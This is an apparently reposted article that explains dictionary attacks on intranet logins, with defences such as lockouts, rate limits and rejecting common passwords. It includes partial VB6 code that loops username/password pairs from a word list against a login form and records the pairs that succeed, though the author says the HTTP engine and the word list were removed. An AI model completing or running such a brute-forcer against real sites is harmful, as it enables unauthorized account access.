Extranet/Intranet Cracker – A Dictionary Attack.

[ben2ong2]

I wrote this Cracker to gain entry into a client’s Intranet, and did so in 2 minutes with a basic dictionary of 100 words (cat,dog,admin,…). The purpose of this article is to stun you into taking the necessary steps to protect your site. I was prompted to write this article because of posted literature exposing You are not allowed to view links. Register or Login susceptibility. If you are looking for a Cracker engine, it is not here. I have removed the communication and word library elements, but the architecture and code are in place so that it is easy to see how entry is gained to your site.

Despite the abundance of security publications, advertisements and television hype describing most unauthorized entry to computers as gained via network vulnerabilities, system flaws, bugs, loopholes, and buffer overflows, the weakest point of any network is the user. Specifically, the user uses a UID of ‘admin’ and PW of ‘password’ or other common words. Truly, this is incredibility widespread.

The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h).

In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server.

   1. To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times-out, the system resets and the user can again gain access with the correct UID/PW.
   2. The ‘rate’ of sending UID/PW addresses the number of attempts to login within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100 word library.
   3. ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compared them against a word library. If the submitted PW is in the library then a different one is requested.

The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW. Using a coma delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access.

Public Function getDictionary(ByVal strURL As String,_

ByVal strMethod As String, ByVal strForm As String, _

ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String

Dim mHTTP As Object, aryDictionary() As String

Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String

ApplicationPath = App.Path & "\"

Set fso = CreateObject("Scripting.FileSystemObject")

Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)

S = S & TextStream.ReadAll

TextStream.Close

DoEvents

getDictionary = getDictionaryAccess(strForm, UidLimitLen, oHTTP, strMatchNoEntry, aryDictionary)

End Function Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer,_

ByRef mHTTP As Object, ByVal strMatchNoEntry As String,_

ByRef aryDictionary() As String) As String

'Returns ";" delimited string of params

'assumes two params of username and password, the exact name value are passed in

'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"

'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary

'the random attack does the 1 to 3 uid and pw matrix

Dim aryParams As Variant, strTemp As String, aryTemp() As String

Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String

iSections = iSections + 1 'iSecitons allows control of word lenght

On Error Resume Next

For uid = 0 To UBound(aryDictionary)

For pw = 0 To UBound(aryDictionary)

If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then

getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _

aryParams(1) & "=" & aryDictionary(pw)

mHTTP engine method call

Call IMWaiting(mHTTP)

strResponse = mHTTP engine data retrieval

Call IMWaiting(mHTTP)

strResponse = Replace(strResponse, Chr(13), ";")

If (strResponse <> "") Then

If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then

'strSomeAccessPoints has the params that GRANTED ACCESS

strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"

End If

End If

strResponse = ""

DoEvents

End If

Next

Next

On Error GoTo 0

getDictionaryAccess = strSomeAccessPoints

End Function

Please, notice this is very standard programing, protect yourself!

NOTE: I found these great tools that Google is giving away for free. They help you develop faster and make windows work better.
Firefox with Google Toolbar

Article By, Matthew P. Burnett.